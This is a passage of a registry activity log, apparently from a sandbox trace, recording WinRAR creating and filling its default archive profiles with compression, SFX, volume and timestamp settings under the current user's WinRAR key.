Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Name, data = Create e-mail attachment, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Name, data = Backup selected files, size = 44, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Default, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcName False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileNames False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ExclNames, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = StoreNames, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = UseRAR, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFXModule, size = 2, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFX False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = CmtFile, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = VolumeSize, data = 0, size = 4, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Solid, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = RecEnabled, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Method, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = DictSizeLZ, data = 33554432, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = DictSize, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = OpenShared, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SaveStreams, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = GenerateArcName, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Name, data = Create e-mail attachment, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Name, data = Backup selected files, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Name, data = Create 10 MB volumes, size = 42, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Default, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcName False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileNames False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ExclNames, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = StoreNames, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = UseRAR, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFXModule, size = 2, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFX False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
